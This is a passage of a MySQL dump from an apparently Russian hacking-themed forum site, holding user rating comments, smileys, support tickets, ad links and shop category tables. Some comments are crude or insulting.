PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=304 DEFAULT CHARSET=utf8;
INSERT INTO rating_hist VALUES("41","27","Радуйся:-)","1","1372340836","13");
INSERT INTO rating_hist VALUES("4","72","","0","1368885955","17");
INSERT INTO rating_hist VALUES("6","8","","0","1368986535","83");
INSERT INTO rating_hist VALUES("9","83","Норм :)","1","1368996498","4");
INSERT INTO rating_hist VALUES("11","83","","1","1369084429","73");
INSERT INTO rating_hist VALUES("12","73","","1","1369084563","83");
INSERT INTO rating_hist VALUES("14","17","","1","1369216392","103");
INSERT INTO rating_hist VALUES("15","27","","1","1369217989","103");
INSERT INTO rating_hist VALUES("16","17","","1","1369220558","103");
INSERT INTO rating_hist VALUES("17","103","","1","1369220652","17");
INSERT INTO rating_hist VALUES("18","27","","1","1369221494","17");
INSERT INTO rating_hist VALUES("20","17","","1","1370623410","26");
INSERT INTO rating_hist VALUES("40","27","","1","1372337254","114");
INSERT INTO rating_hist VALUES("22","50","","1","1371120257","26");
INSERT INTO rating_hist VALUES("23","137","","1","1371297629","26");
INSERT INTO rating_hist VALUES("24","27","Супер","1","1371846918","50");
INSERT INTO rating_hist VALUES("25","73","","1","1372080617","242");
INSERT INTO rating_hist VALUES("26","242","","1","1372082852","237");
INSERT INTO rating_hist VALUES("27","237","","1","1372130776","242");
INSERT INTO rating_hist VALUES("28","27",",","1","1372180030","250");
INSERT INTO rating_hist VALUES("29","27","","1","1372217192","200");
INSERT INTO rating_hist VALUES("30","27","","1","1372220968","26");
INSERT INTO rating_hist VALUES("31","26","","1","1372225501","137");
INSERT INTO rating_hist VALUES("32","73","","1","1372226683","137");
INSERT INTO rating_hist VALUES("33","27","","1","1372238587","114");
INSERT INTO rating_hist VALUES("34","27","держи","1","1372244413","99");
INSERT INTO rating_hist VALUES("35","114","","1","1372245467","99");
INSERT INTO rating_hist VALUES("36","27","держи","1","1372247010","257");
INSERT INTO rating_hist VALUES("37","13","умный чел","1","1372253678","200");
INSERT INTO rating_hist VALUES("38","27","за помощь","1","1372259474","200");
INSERT INTO rating_hist VALUES("39","137","","1","1372265122","26");
INSERT INTO rating_hist VALUES("42","27","","1","1372418948","99");
INSERT INTO rating_hist VALUES("43","27","","1","1372437288","271");
INSERT INTO rating_hist VALUES("44","27","","1","1372455972","99");
INSERT INTO rating_hist VALUES("45","13","нормальный тип","1","1372459175","99");
INSERT INTO rating_hist VALUES("46","27","","1","1372506378","99");
INSERT INTO rating_hist VALUES("47","1","+","1","1372520999","293");
INSERT INTO rating_hist VALUES("48","1","","1","1372532227","99");
INSERT INTO rating_hist VALUES("49","27","+","1","1372533693","245");
INSERT INTO rating_hist VALUES("50","27","","1","1372533960","99");
INSERT INTO rating_hist VALUES("51","73","","1","1372582045","271");
INSERT INTO rating_hist VALUES("52","27","","1","1372596634","249");
INSERT INTO rating_hist VALUES("54","234","","1","1372615184","271");
INSERT INTO rating_hist VALUES("55","1","нормальная инфа","1","1372616651","99");
INSERT INTO rating_hist VALUES("56","27","","1","1372625653","99");
INSERT INTO rating_hist VALUES("57","1","Здарово :D","1","1372649374","2");
INSERT INTO rating_hist VALUES("58","2","","1","1372664377","27");
INSERT INTO rating_hist VALUES("59","137","http://dcms-social.ru/forum/16/18/4366/","0","1372678885","172");
INSERT INTO rating_hist VALUES("60","49","","1","1372700726","271");
INSERT INTO rating_hist VALUES("61","168","))","1","1372711310","27");
INSERT INTO rating_hist VALUES("62","121","Барыга, кидала","0","1372724193","164");
INSERT INTO rating_hist VALUES("87","3","Хех :D","1","1374580214","390");
INSERT INTO rating_hist VALUES("64","114","","1","1373304275","271");
INSERT INTO rating_hist VALUES("65","99","","1","1373316334","340");
INSERT INTO rating_hist VALUES("66","3","плююююююс. просто плюс :-)","1","1373321105","99");
INSERT INTO rating_hist VALUES("67","3","","1","1373387552","271");
INSERT INTO rating_hist VALUES("68","3","копи","1","1373403827","99");
INSERT INTO rating_hist VALUES("69","1","","1","1373568265","354");
INSERT INTO rating_hist VALUES("70","3",";)","1","1373610019","350");
INSERT INTO rating_hist VALUES("71","212","","1","1373644857","271");
INSERT INTO rating_hist VALUES("72","3","МОЛОДЕЦ","1","1373730294","372");
INSERT INTO rating_hist VALUES("73","2","","1","1373733296","371");
INSERT INTO rating_hist VALUES("74","1","","1","1373733717","371");
INSERT INTO rating_hist VALUES("75","138","","1","1373734666","371");
INSERT INTO rating_hist VALUES("76","3","","1","1373736352","371");
INSERT INTO rating_hist VALUES("77","340","","1","1373737483","371");
INSERT INTO rating_hist VALUES("78","373","","1","1373744591","371");
INSERT INTO rating_hist VALUES("80","1","","1","1373793164","374");
INSERT INTO rating_hist VALUES("81","371","","1","1374327570","271");
INSERT INTO rating_hist VALUES("82","271","","1","1374338202","371");
INSERT INTO rating_hist VALUES("83","371","","1","1374392273","271");
INSERT INTO rating_hist VALUES("84","3","плюсую","1","1374438103","350");
INSERT INTO rating_hist VALUES("85","2","2","1","1374573664","1");
INSERT INTO rating_hist VALUES("86","1","Харошэ парнишэ :D","1","1374576655","2");
INSERT INTO rating_hist VALUES("88","3","","1","1374588946","73");
INSERT INTO rating_hist VALUES("89","3","","1","1374719444","303");
INSERT INTO rating_hist VALUES("90","303",":)","1","1374719489","3");
INSERT INTO rating_hist VALUES("109","1","","1","1375861738","371");
INSERT INTO rating_hist VALUES("110","1","","1","1375876675","479");
INSERT INTO rating_hist VALUES("93","1","хороший друг и собеседник)","1","1374766984","271");
INSERT INTO rating_hist VALUES("94","73","хороший человек)","1","1374767170","271");
INSERT INTO rating_hist VALUES("95","3","","1","1374877811","365");
INSERT INTO rating_hist VALUES("96","382","","1","1375001138","271");
INSERT INTO rating_hist VALUES("97","303","","1","1375111484","271");
INSERT INTO rating_hist VALUES("98","271","","1","1375124064","303");
INSERT INTO rating_hist VALUES("99","10","","1","1375205484","271");
INSERT INTO rating_hist VALUES("111","271",":)","1","1375954554","10");
INSERT INTO rating_hist VALUES("101","1","","1","1375591722","436");
INSERT INTO rating_hist VALUES("116","511","","1","1376411933","271");
INSERT INTO rating_hist VALUES("103","436","","1","1375610819","271");
INSERT INTO rating_hist VALUES("104","114","","1","1375700126","445");
INSERT INTO rating_hist VALUES("105","114","","1","1375700972","445");
INSERT INTO rating_hist VALUES("106","463","","1","1375713004","357");
INSERT INTO rating_hist VALUES("107","357","","1","1375713673","463");
INSERT INTO rating_hist VALUES("108","1","","1","1375785135","99");
INSERT INTO rating_hist VALUES("112","10","","1","1376332245","271");
INSERT INTO rating_hist VALUES("113","3","хорошему кодеру)","1","1376333418","489");
INSERT INTO rating_hist VALUES("114","350","","0","1376387559","489");
INSERT INTO rating_hist VALUES("115","271",":)","1","1376391824","10");
INSERT INTO rating_hist VALUES("117","2",":-):-):-):-):-):-):-):-):-)","1","1376466202","490");
INSERT INTO rating_hist VALUES("118","350","За оффтоп в теме","0","1376485588","37");
INSERT INTO rating_hist VALUES("119","546","","1","1376486181","350");
INSERT INTO rating_hist VALUES("120","546","2))))","1","1376486422","350");
INSERT INTO rating_hist VALUES("121","546","3","1","1376488285","350");
INSERT INTO rating_hist VALUES("122","3","","1","1376505204","479");
INSERT INTO rating_hist VALUES("135","1","","1","1377022203","569");
INSERT INTO rating_hist VALUES("124","1","За то, что создал этот хак сайт)))","1","1376623092","519");
INSERT INTO rating_hist VALUES("125","114","","1","1376631724","350");
INSERT INTO rating_hist VALUES("126","511","Хер тебе, а не доступ","0","1376675069","484");
INSERT INTO rating_hist VALUES("127","531","= )","1","1376720037","271");
INSERT INTO rating_hist VALUES("128","271","про100 +","1","1376720998","531");
INSERT INTO rating_hist VALUES("129","519","","1","1376806713","271");
INSERT INTO rating_hist VALUES("130","573","super","1","1376824428","575");
INSERT INTO rating_hist VALUES("131","489","Хорошый чел) и сорри за минус не хотел.","1","1376906153","392");
INSERT INTO rating_hist VALUES("132","114","","1","1376925968","489");
INSERT INTO rating_hist VALUES("133","3","","1","1376937081","489");
INSERT INTO rating_hist VALUES("134","3","Для количества! :D","1","1376946406","573");
INSERT INTO rating_hist VALUES("136","575",":D","1","1377025465","573");
INSERT INTO rating_hist VALUES("137","1","","1","1377027012","573");
INSERT INTO rating_hist VALUES("138","3","азазаза:D","1","1377071657","1");
INSERT INTO rating_hist VALUES("139","3","Мой плюс за ясный ответ.","1","1377153555","137");
INSERT INTO rating_hist VALUES("140","294","Просто лох","0","1377281724","703");
INSERT INTO rating_hist VALUES("150","573","респектую","1","1377803057","363");
INSERT INTO rating_hist VALUES("142","268","+++","1","1377517610","114");
INSERT INTO rating_hist VALUES("143","114",";)","1","1377518146","268");
INSERT INTO rating_hist VALUES("144","80","за помощь","1","1377594412","97");
INSERT INTO rating_hist VALUES("145","3","","1","1377599715","652");
INSERT INTO rating_hist VALUES("146","114","Помог)","1","1377639500","531");
INSERT INTO rating_hist VALUES("147","3",":)","1","1377681604","432");
INSERT INTO rating_hist VALUES("148","843","","1","1377731893","531");
INSERT INTO rating_hist VALUES("151","363","","1","1377803265","573");
INSERT INTO rating_hist VALUES("152","200","","1","1377809204","530");
INSERT INTO rating_hist VALUES("153","2","","1","1377832350","4");
INSERT INTO rating_hist VALUES("154","3","Ну что там с игрой,пожалуйста","1","1377845773","530");
INSERT INTO rating_hist VALUES("155","432","Плиз","1","1377868972","530");
INSERT INTO rating_hist VALUES("165","573","","1","1378432929","303");
INSERT INTO rating_hist VALUES("157","815","балабол","0","1377884849","470");
INSERT INTO rating_hist VALUES("158","3","","1","1377982765","878");
INSERT INTO rating_hist VALUES("159","883","Заходи на xak-zona.ru","1","1378006323","531");
INSERT INTO rating_hist VALUES("160","4","за брут","1","1378039471","97");
INSERT INTO rating_hist VALUES("161","4","просто так","1","1378039876","891");
INSERT INTO rating_hist VALUES("162","3","","1","1378136286","97");
INSERT INTO rating_hist VALUES("163","3","Отличный человек)<br />Помог разобраться в xss","1","1378137581","470");
INSERT INTO rating_hist VALUES("164","891","+++","1","1378138228","911");
INSERT INTO rating_hist VALUES("166","303","","1","1378480010","573");
INSERT INTO rating_hist VALUES("167","940","ебан","0","1378780348","774");
INSERT INTO rating_hist VALUES("168","3","","1","1380474960","371");
INSERT INTO rating_hist VALUES("169","573","","1","1380563152","489");
INSERT INTO rating_hist VALUES("170","489","Ответный!","1","1380564304","573");
INSERT INTO rating_hist VALUES("171","531","","1","1380566532","489");
INSERT INTO rating_hist VALUES("172","1","","1","1380629522","1036");
INSERT INTO rating_hist VALUES("173","3","","1","1380663937","1030");
INSERT INTO rating_hist VALUES("174","3","++++","1","1380998269","538");
INSERT INTO rating_hist VALUES("175","2","+++","1","1381036586","538");
INSERT INTO rating_hist VALUES("176","976","","1","1381952962","1030");
INSERT INTO rating_hist VALUES("177","3","норм","1","1382019301","1089");
INSERT INTO rating_hist VALUES("178","891","","1","1382023423","1086");
INSERT INTO rating_hist VALUES("179","3","","1","1382034888","489");
INSERT INTO rating_hist VALUES("180","3","","1","1382157677","1089");
INSERT INTO rating_hist VALUES("181","2","Норм поц","1","1382191261","97");
INSERT INTO rating_hist VALUES("182","73","за норм общение","1","1382458185","1089");
INSERT INTO rating_hist VALUES("183","3","","1","1382558040","1112");
INSERT INTO rating_hist VALUES("184","3","хороший человек","1","1382559814","798");
INSERT INTO rating_hist VALUES("185","573","За хорошую работу на посту админа :-D","1","1382607935","1064");
INSERT INTO rating_hist VALUES("186","1064","Ответ!","1","1382630905","573");
INSERT INTO rating_hist VALUES("187","573","","1","1382639256","1100");
INSERT INTO rating_hist VALUES("188","1100","Ответный!","1","1382640127","573");
INSERT INTO rating_hist VALUES("189","1","Почини уже куки на этом сайте","1","1382715354","1064");
INSERT INTO rating_hist VALUES("190","538","Cool","1","1382981507","363");
INSERT INTO rating_hist VALUES("191","363","Бро :)","1","1383057677","538");
INSERT INTO rating_hist VALUES("203","573","","1","1384592039","2");
INSERT INTO rating_hist VALUES("193","1104","ыыыыыы ты достоен!!!!!!!!!!!!","1","1383218447","1141");
INSERT INTO rating_hist VALUES("194","667","","0","1383483104","97");
INSERT INTO rating_hist VALUES("195","325","","1","1383541376","968");
INSERT INTO rating_hist VALUES("196","611","Ну пж)","1","1383987237","1170");
INSERT INTO rating_hist VALUES("197","611","Нуу)","1","1383987441","1170");
INSERT INTO rating_hist VALUES("198","1","Твой покупатель зе-фарма","1","1383998910","519");
INSERT INTO rating_hist VALUES("199","3","норм чел, помогает","1","1384017313","1076");
INSERT INTO rating_hist VALUES("200","1","норм чел","1","1384077506","798");
INSERT INTO rating_hist VALUES("201","489","","1","1384537487","1200");
INSERT INTO rating_hist VALUES("202","1200","","1","1384537571","489");
INSERT INTO rating_hist VALUES("204","2","","1","1384592307","573");
INSERT INTO rating_hist VALUES("205","1033","","1","1384594544","1201");
INSERT INTO rating_hist VALUES("206","1","броооооо)))","1","1384623071","1215");
INSERT INTO rating_hist VALUES("207","1016","","1","1384630044","489");
INSERT INTO rating_hist VALUES("208","3","","1","1384641565","489");
INSERT INTO rating_hist VALUES("209","1","норм чел","1","1384682348","1191");
INSERT INTO rating_hist VALUES("210","1200","","1","1384692238","489");
INSERT INTO rating_hist VALUES("211","489","","1","1384698445","1200");
INSERT INTO rating_hist VALUES("212","639","","1","1384707858","1215");
INSERT INTO rating_hist VALUES("213","489","обмен:)","1","1384708640","639");
INSERT INTO rating_hist VALUES("214","1215","Пасиба :-D","1","1384712145","1088");
INSERT INTO rating_hist VALUES("215","489","Ы","1","1384713930","1099");
INSERT INTO rating_hist VALUES("216","1076","Отзывчивый человек)))","1","1384717114","10");
INSERT INTO rating_hist VALUES("217","1","","1","1384795411","1033");
INSERT INTO rating_hist VALUES("218","489","","1","1384807883","1200");
INSERT INTO rating_hist VALUES("219","639","","1","1384807983","489");
INSERT INTO rating_hist VALUES("220","1033","","1","1384891215","1201");
INSERT INTO rating_hist VALUES("221","1033","","1","1384891402","1201");
INSERT INTO rating_hist VALUES("222","581","","1","1385044500","538");
INSERT INTO rating_hist VALUES("223","489","","1","1385044885","538");
INSERT INTO rating_hist VALUES("224","2","","1","1385286676","1271");
INSERT INTO rating_hist VALUES("225","489","","1","1385321705","1276");
INSERT INTO rating_hist VALUES("226","1271","+","1","1385358818","325");
INSERT INTO rating_hist VALUES("227","325","","1","1385375763","1296");
INSERT INTO rating_hist VALUES("228","531","мне тож поставь","1","1385378638","325");
INSERT INTO rating_hist VALUES("229","3","","1","1385378992","325");
INSERT INTO rating_hist VALUES("230","363","и мне +","1","1385379366","325");
INSERT INTO rating_hist VALUES("231","1288","","1","1385487478","1260");
INSERT INTO rating_hist VALUES("232","1309","","1","1385533591","1276");
INSERT INTO rating_hist VALUES("233","325","фиговый мд","0","1385636524","1335");
INSERT INTO rating_hist VALUES("234","363","Za rzhane +","1","1385840192","1349");
INSERT INTO rating_hist VALUES("235","3","Za to chto ne budesh ego obzybat`","1","1385841595","1349");
INSERT INTO rating_hist VALUES("236","1349","","1","1385843396","363");
INSERT INTO rating_hist VALUES("237","798","","0","1385903348","711");
INSERT INTO rating_hist VALUES("238","573","+++++++","1","1385909789","1356");
INSERT INTO rating_hist VALUES("239","3","++++++","1","1386181015","1103");
INSERT INTO rating_hist VALUES("240","1","","1","1386244687","1260");
INSERT INTO rating_hist VALUES("241","1016","","1","1386427114","1393");
INSERT INTO rating_hist VALUES("242","3","++++","1","1386522487","1399");
INSERT INTO rating_hist VALUES("243","1293","","1","1386545452","1201");
INSERT INTO rating_hist VALUES("244","1201","Хороший человек,помогает.","1","1386545615","1293");
INSERT INTO rating_hist VALUES("245","1201","","1","1386545810","1293");
INSERT INTO rating_hist VALUES("246","1","","1","1386547896","1293");
INSERT INTO rating_hist VALUES("247","32231","","1","1386690020","1201");
INSERT INTO rating_hist VALUES("248","1201",":-)","1","1386698640","32231");
INSERT INTO rating_hist VALUES("249","32231","","1","1386705649","1201");
INSERT INTO rating_hist VALUES("250","1375","","1","1386706865","1201");
INSERT INTO rating_hist VALUES("251","573","","1","1386708281","1201");
INSERT INTO rating_hist VALUES("252","73","","1","1386715375","1201");
INSERT INTO rating_hist VALUES("253","573","","1","1386715870","1201");
INSERT INTO rating_hist VALUES("254","1201","","1","1386716095","573");
INSERT INTO rating_hist VALUES("255","1","","1","1386762895","1201");
INSERT INTO rating_hist VALUES("256","1360","по братски","1","1386783489","1201");
INSERT INTO rating_hist VALUES("257","1360","","1","1386784100","1201");
INSERT INTO rating_hist VALUES("258","1360","","1","1386787723","1201");
INSERT INTO rating_hist VALUES("259","97","","1","1386841370","1201");
INSERT INTO rating_hist VALUES("260","778","","1","1386842229","1201");
INSERT INTO rating_hist VALUES("261","1201","Хорош парень (девушка) не понять кто он:D","1","1386842345","778");
INSERT INTO rating_hist VALUES("262","32223","","1","1386842432","1201");
INSERT INTO rating_hist VALUES("263","778","","1","1386842647","1201");
INSERT INTO rating_hist VALUES("264","32236","это для старта","1","1386843783","1201");
INSERT INTO rating_hist VALUES("265","629","","1","1386847988","1201");
INSERT INTO rating_hist VALUES("266","1360","","1","1386852576","1201");
INSERT INTO rating_hist VALUES("267","778","","1","1386864169","1201");
INSERT INTO rating_hist VALUES("268","581","","1","1386878326","1201");
INSERT INTO rating_hist VALUES("269","774","","1","1386944582","1201");
INSERT INTO rating_hist VALUES("270","1","","1","1387004753","1384");
INSERT INTO rating_hist VALUES("271","32241","","1","1387043697","1201");
INSERT INTO rating_hist VALUES("272","2","","1","1387048259","1384");
INSERT INTO rating_hist VALUES("273","107","Фуу ШКОЛОТКА","0","1387408002","1395");
INSERT INTO rating_hist VALUES("274","234","","0","1387898777","1254");
INSERT INTO rating_hist VALUES("275","1254","За незаслуженный минус","0","1387927547","234");
INSERT INTO rating_hist VALUES("276","365","","1","1388165706","32275");
INSERT INTO rating_hist VALUES("277","32275","","1","1388170566","365");
INSERT INTO rating_hist VALUES("278","573","","1","1389627205","1254");
INSERT INTO rating_hist VALUES("279","1254","Уревновесил! :D","1","1389627723","573");
INSERT INTO rating_hist VALUES("280","1","","1","1389760324","920");
INSERT INTO rating_hist VALUES("281","32257","лови как то","1","1390688228","32400");
INSERT INTO rating_hist VALUES("282","32400","На:)","1","1390688344","32257");
INSERT INTO rating_hist VALUES("283","1","+++++","1","1390728576","32306");
INSERT INTO rating_hist VALUES("284","1",":):)","1","1390742757","32400");
INSERT INTO rating_hist VALUES("285","32257","","1","1390826344","325");
INSERT INTO rating_hist VALUES("286","32453","Просто","1","1390896359","32427");
INSERT INTO rating_hist VALUES("287","80","","1","1390905276","325");
INSERT INTO rating_hist VALUES("288","1","","1","1390917917","32427");
INSERT INTO rating_hist VALUES("289","1","Хороший чел)","1","1390991608","32413");
INSERT INTO rating_hist VALUES("290","1","Спасибо.","1","1390992275","32413");
INSERT INTO rating_hist VALUES("291","1","////////////////////","1","1420268200","5");
INSERT INTO rating_hist VALUES("292","1","другу","1","1420282907","6");
INSERT INTO rating_hist VALUES("293","6","Класс","1","1420283390","1");
INSERT INTO rating_hist VALUES("294","6",",................","1","1420972978","5");
INSERT INTO rating_hist VALUES("295","5","++++++++++","1","1420974695","6");
INSERT INTO rating_hist VALUES("296","1","","1","1426448074","27");
INSERT INTO rating_hist VALUES("297","1","жтжДен Гг","1","1426487102","51");
INSERT INTO rating_hist VALUES("298","1","Норм","1","1426619914","7");
INSERT INTO rating_hist VALUES("299","7","","1","1426668094","21");
INSERT INTO rating_hist VALUES("300","7","Норм чел","1","1427107878","82");
INSERT INTO rating_hist VALUES("301","5","Норм паря","1","1427547605","82");
INSERT INTO rating_hist VALUES("302","94","","1","1436521547","101");
INSERT INTO rating_hist VALUES("303","94","","1","1437802029","150");
DROP TABLE IF EXISTS `rating_loads`;
CREATE TABLE `rating_loads` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`who` int(11) NOT NULL DEFAULT '0',
`like` smallint(1) NOT NULL DEFAULT '0',
`dlike` smallint(1) NOT NULL DEFAULT '0',
`uid` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=8 DEFAULT CHARSET=utf8;
INSERT INTO rating_loads VALUES("2","174","1","0","2");
INSERT INTO rating_loads VALUES("3","212","1","0","2");
INSERT INTO rating_loads VALUES("5","223","1","0","6");
INSERT INTO rating_loads VALUES("6","257","1","0","2");
DROP TABLE IF EXISTS `rating_news`;
CREATE TABLE `rating_news` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`who` int(11) NOT NULL DEFAULT '0',
`like` smallint(1) NOT NULL DEFAULT '0',
`dlike` smallint(1) NOT NULL DEFAULT '0',
`uid` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=120 DEFAULT CHARSET=utf8;
INSERT INTO rating_news VALUES("116","6","1","0","34");
INSERT INTO rating_news VALUES("115","5","1","0","34");
INSERT INTO rating_news VALUES("114","1","1","0","34");
INSERT INTO rating_news VALUES("117","30","1","0","34");
INSERT INTO rating_news VALUES("118","102","0","1","34");
INSERT INTO rating_news VALUES("119","101","1","0","34");
DROP TABLE IF EXISTS `razdel_tovar`;
CREATE TABLE `razdel_tovar` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`title` char(30) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
INSERT INTO razdel_tovar VALUES("1","PHP скрипты");
INSERT INTO razdel_tovar VALUES("2","Дизайны");
INSERT INTO razdel_tovar VALUES("3","Графика");
DROP TABLE IF EXISTS `reklama`;
CREATE TABLE `reklama` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`link` char(100) NOT NULL,
`name` char(25) NOT NULL,
`look` tinyint(1) NOT NULL DEFAULT '0',
`time` int(11) NOT NULL,
`srok` int(11) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=58 DEFAULT CHARSET=utf8 ROW_FORMAT=DYNAMIC;
INSERT INTO reklama VALUES("54","hackbite.ru/billing/index.php?do=reklama","Место свободно","0","0","0");
INSERT INTO reklama VALUES("57","our-vps.ru","Our-Vps - Хостинг","0","0","0");
DROP TABLE IF EXISTS `setting`;
CREATE TABLE `setting` (
`ids` int(1) NOT NULL DEFAULT '1',
`open_chat` smallint(1) NOT NULL DEFAULT '1',
`on_rekl` smallint(1) NOT NULL DEFAULT '0',
`text_rekl` char(50) NOT NULL,
`antimat` smallint(2) NOT NULL DEFAULT '0',
`fo_moder` smallint(2) NOT NULL DEFAULT '0',
`fo_limit` int(11) NOT NULL DEFAULT '2048',
PRIMARY KEY (`ids`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
INSERT INTO setting VALUES("1","1","0","жопо сайт","1","1","30");
DROP TABLE IF EXISTS `smiles`;
CREATE TABLE `smiles` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` char(30) NOT NULL DEFAULT '0',
`path` char(30) NOT NULL DEFAULT '0',
`cat` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=165 DEFAULT CHARSET=utf8;
INSERT INTO smiles VALUES("105","*хмм*","smiles/1377240933.png","12");
INSERT INTO smiles VALUES("104","*дурак*","smiles/1377240892.gif","12");
INSERT INTO smiles VALUES("100","*зол*","smiles/1377240782.png","12");
INSERT INTO smiles VALUES("99","*лох*","smiles/1377240761.png","12");
INSERT INTO smiles VALUES("161",":(","smiles/1390927278.gif","13");
INSERT INTO smiles VALUES("162",":)","smiles/1390927295.gif","13");
INSERT INTO smiles VALUES("139","*flood*","smiles/1377879876.gif","13");
INSERT INTO smiles VALUES("163",":D","smiles/1390927311.gif","13");
INSERT INTO smiles VALUES("138","*ban*","smiles/1377879865.gif","13");
INSERT INTO smiles VALUES("129","*лал*","smiles/1377492676.gif","12");
INSERT INTO smiles VALUES("122","*лол*","smiles/1377491935.gif","14");
INSERT INTO smiles VALUES("160","*лошара*","smiles/1390927183.png","12");
INSERT INTO smiles VALUES("117","*гы*","smiles/1377241723.gif","13");
INSERT INTO smiles VALUES("121","*бля*","smiles/1377491853.gif","14");
INSERT INTO smiles VALUES("102","*блат*","smiles/1377240834.png","12");
INSERT INTO smiles VALUES("120","*зачёт*","smiles/1377490979.gif","14");
INSERT INTO smiles VALUES("114","*хыхы*","smiles/1377241634.gif","13");
INSERT INTO smiles VALUES("113","*ржунемогу*","smiles/1377241607.gif","13");
INSERT INTO smiles VALUES("108","*мда*","smiles/1377240995.png","12");
INSERT INTO smiles VALUES("107","*даун*","smiles/1377240972.png","12");
INSERT INTO smiles VALUES("96","*шта*","smiles/1377240654.png","12");
INSERT INTO smiles VALUES("109","*неплох*","smiles/1377241215.png","12");
INSERT INTO smiles VALUES("103","*упорот*","smiles/1377240867.png","12");
INSERT INTO smiles VALUES("106","*лис*","smiles/1377240953.png","12");
INSERT INTO smiles VALUES("101","*оченьзол*","smiles/1377240811.png","12");
INSERT INTO smiles VALUES("93","*дану2*","smiles/1377240540.png","12");
INSERT INTO smiles VALUES("92","*дану*","smiles/1377240484.png","12");
INSERT INTO smiles VALUES("98","*ботан*","smiles/1377240736.png","12");
INSERT INTO smiles VALUES("97","*вазмутитильна*","smiles/1377240705.png","12");
INSERT INTO smiles VALUES("94","*данет*","smiles/1377240571.png","12");
INSERT INTO smiles VALUES("91","*кайф*","smiles/1377240455.png","12");
INSERT INTO smiles VALUES("142","*facepalm*","smiles/1378044660.gif","13");
INSERT INTO smiles VALUES("143","*омг*","smiles/1378044696.gif","13");
INSERT INTO smiles VALUES("164","*wink*","smiles/1390927393.gif","13");
INSERT INTO smiles VALUES("152","*збс*","smiles/1384163690.png","13");
INSERT INTO smiles VALUES("158","*перекур*","smiles/1384164816.png","16");
INSERT INTO smiles VALUES("159","Гг","smiles/1384531243.gif","13");
DROP TABLE IF EXISTS `support`;
CREATE TABLE `support` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`type` char(10) NOT NULL DEFAULT '',
`name` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
INSERT INTO support VALUES("2","3","yes","Сделайте меня ст.админом :D");
INSERT INTO support VALUES("3","436","news","Взломайте какой нибудь сайт");
DROP TABLE IF EXISTS `support_coms`;
CREATE TABLE `support_coms` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`date` int(11) NOT NULL DEFAULT '0',
`mes` text NOT NULL,
`uid` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
INSERT INTO support_coms VALUES("1","377","1374069658","ДОоооо?","2");
INSERT INTO support_coms VALUES("2","3","1374606330","[b]Ответ: romanvht[/b], :D","2");
DROP TABLE IF EXISTS `tovar_komm`;
CREATE TABLE `tovar_komm` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`user` int(11) NOT NULL DEFAULT '0',
`uid` int(11) NOT NULL DEFAULT '0',
`msg` text NOT NULL,
`date` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
INSERT INTO tovar_komm VALUES("1","65","49","если честно то лажа полнейшая","1426772763");
DROP TABLE IF EXISTS `tovar_magazin`;
CREATE TABLE `tovar_magazin` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`url` char(100) NOT NULL,
`time` int(11) NOT NULL,
`clicks` int(11) NOT NULL DEFAULT '0',
`author` int(11) NOT NULL,
`title` char(100) NOT NULL,
`info` text NOT NULL,
`parol` char(10) DEFAULT NULL,
`moder` smallint(2) NOT NULL DEFAULT '0',
`rid` int(11) NOT NULL DEFAULT '0',
`cat` int(11) NOT NULL DEFAULT '0',
`screen` char(100) NOT NULL,
`cena` int(11) NOT NULL,
`func` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
DROP TABLE IF EXISTS `tovar_podrazdel`;
CREATE TABLE `tovar_podrazdel` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`cid` int(11) NOT NULL DEFAULT '0',
`title` char(50) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=20 DEFAULT CHARSET=utf8;
INSERT INTO tovar_podrazdel VALUES("2","1","DCMS");
INSERT INTO tovar_podrazdel VALUES("3","1","JohnCMS");
INSERT INTO tovar_podrazdel VALUES("4","1","MobileCMS");
INSERT INTO tovar_podrazdel VALUES("5","1","RotorCMS");
INSERT INTO tovar_podrazdel VALUES("6","1","Двиг Кота");
INSERT INTO tovar_podrazdel VALUES("7","1","KingCMS / PWMCMS");
INSERT INTO tovar_podrazdel VALUES("8","1","PHP скрипты");
INSERT INTO tovar_podrazdel VALUES("9","1","Другие");
INSERT INTO tovar_podrazdel VALUES("10","2","DCMS");
INSERT INTO tovar_podrazdel VALUES("11","2","JohnCMS");
INSERT INTO tovar_podrazdel VALUES("12","2","Шаблоны");
INSERT INTO tovar_podrazdel VALUES("13","2","Другие CMS");
INSERT INTO tovar_podrazdel VALUES("14","3","Счетчики");
INSERT INTO tovar_podrazdel VALUES("15","3","Иконки");
INSERT INTO tovar_podrazdel VALUES("16","3","Шаблоны аватарок");
INSERT INTO tovar_podrazdel VALUES("17","1","Шаблоны логотипов");
INSERT INTO tovar_podrazdel VALUES("18","3","Шаблоны логотипов");
INSERT INTO tovar_podrazdel VALUES("19","3","Прочее");
DROP TABLE IF EXISTS `users`;
CREATE TABLE `users` (
`id` int(11) NOT NULL AUTO_INCREMENT,
